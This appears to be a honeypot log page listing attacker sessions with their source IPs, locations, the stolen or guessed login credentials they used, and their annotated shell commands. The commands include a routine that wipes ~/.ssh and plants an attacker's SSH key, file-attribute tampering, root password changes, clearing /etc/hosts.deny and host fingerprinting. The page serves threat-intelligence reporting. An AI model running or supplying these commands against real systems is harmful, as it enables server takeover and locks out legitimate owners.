$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:trqR8UboPyHw"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "devuser@2024\nCunC3GhCTZMT\nCunC3GhCTZMT"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "devuser@2024\nCunC3GhCTZMT\nCunC3GhCTZMT\n"|passwd
$ echo -e "123456\nl0KTEP53i7nm\nl0KTEP53i7nm"|passwd|bash
$ echo "123456\nl0KTEP53i7nm\nl0KTEP53i7nm\n"|passwd
🎭 eagle_root_20 (216.250.115.98) β€” Los Angeles, United States Β· 2 sessions Β· 22 cmds
2026-06-03 05:21 EDT Β· as root/Wp123456@, vmail/123456
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nGk1IPGa3oGVw\nGk1IPGa3oGVw"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nGk1IPGa3oGVw\nGk1IPGa3oGVw\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_37 (103.191.14.210) β€” Utan, Indonesia Β· 1 session Β· 20 cmds
2026-06-03 05:26 EDT Β· as mahsa/1234
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1234\nKBh2RiJdeKTa\nKBh2RiJdeKTa"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\nKBh2RiJdeKTa\nKBh2RiJdeKTa\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_23 (190.242.109.42) β€” MedellΓ­n, Colombia Β· 7 sessions Β· 31 cmds
2026-05-16 15:07 EDT Β· as irfan/irfan123, root/1qazxsw21qazxsw2, root/@qwer2025
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—7 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—7 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:r2YEDOAmnkHC"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_40 (101.36.124.127) β€” Hong Kong, Hong Kong Β· 4 sessions Β· 42 cmds
2026-05-18 05:23 EDT Β· as irfan/irfan123, root/@qwer2025, root/eric123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:KnWGqR0zIda7"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:swNDb1nKRDto"|chpasswd|bash
🎭 rogue_root_38 (14.225.253.26) β€” Hanoi, Vietnam Β· 2 sessions Β· 4 cmds
2026-06-03 05:13 EDT Β· as ftp/ftp@123, root/@qwer2025
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 rogue_root_39 (125.212.235.194) β€” Hanoi, Vietnam Β· 1 session Β· 2 cmds
2026-06-03 05:04 EDT Β· as root/@qwer2025
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 phantom_root_36 (80.87.83.229) β€” Accra, Ghana Β· 1 session Β· 2 cmds
2026-06-03 04:53 EDT Β· as root/root2root
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 wraith_7 (38.147.122.123) β€” Singapore, Singapore Β· 1 session Β· 2 cmds
2026-06-03 04:44 EDT Β· as irfan/irfan123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 lantern_root (47.94.227.171) β€” Beijing, China Β· 2 sessions Β· 2 cmds
2026-06-03 04:36 EDT Β· as root/102030, root/abcd1234
grep
$ grep -c ^processor /proc/cpuinfo Γ—2
🎭 dutch_root_2 (176.65.132.22) β€” Eygelshoven, The Netherlands Β· 2 sessions Β· 2 cmds
2026-06-03 01:10 EDT Β· as root/102030, runner/1
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—2
🎭 tiger_root_5 (118.185.147.226) β€” Chennai, India Β· 2 sessions Β· 4 cmds
2026-06-03 00:25 EDT Β· as mamad/mamad, root/1q2w3e4r$R#E@W!Q
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 sakura_root_3 (133.18.180.27) β€” Osaka, Japan Β· 3 sessions Β· 23 cmds
2026-06-02 23:40 EDT Β· as edu/edu123, mamad/mamad, root/1q2w3e4r$R#E@W!Q
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ep0HWX2ub7Nh"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 tiger_root_6 (182.76.66.186) β€” Ahmedabad, India Β· 1 session Β· 2 cmds
2026-06-03 00:15 EDT Β· as root/Hy@123456
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 tiger_root_7 (49.200.158.226) β€” New Delhi, India Β· 1 session Β· 2 cmds
2026-06-02 23:46 EDT Β· as edu/edu123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 jade_root_7 (180.76.240.16) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-06-02 23:43 EDT Β· as mamad/mamad
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "mamad\nFirdaXKfGefc\nFirdaXKfGefc"|passwd|bash
$ Enter new UNIX password:
$ echo "mamad\nFirdaXKfGefc\nFirdaXKfGefc\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_51 (200.105.172.184) β€” La Paz, Bolivia Β· 1 session Β· 20 cmds
2026-06-02 23:36 EDT Β· as ubuntu/Admin123!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Admin123!\nRy02aOmjdLV3\nRy02aOmjdLV3"|passwd|bash
$ Enter new UNIX password:
$ echo "Admin123!\nRy02aOmjdLV3\nRy02aOmjdLV3\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stroopwafel_root (45.153.34.181) β€” Eygelshoven, Netherlands Β· 1 session Β· 1 cmd
2026-06-02 23:29 EDT Β· as runner/1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 cipher_root_38 (103.77.246.158) β€” Yen Hoa, Vietnam Β· 1 session Β· 1 cmd
2026-06-02 23:20 EDT Β· as # Admin username variants for brute force/!!!!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a && echo "====" && cat /etc/os-release
🎭 meatball_root_2 (171.25.158.24) β€” Vaxjo, Sweden Β· 1 session Β· 19 cmds
2026-06-02 22:16 EDT Β· as root/ubuntu@123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:zxHwoqLu1gkX"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_13 (61.153.104.6) β€” Hangzhou, China Β· 1 session Β· 1 cmd
2026-06-02 21:32 EDT Β· as root/---fuck_you----
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 jade_root_8 (120.48.67.104) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-06-02 21:13 EDT Β· as root/Admin.2026
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:hOHQUpCdfJN7"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
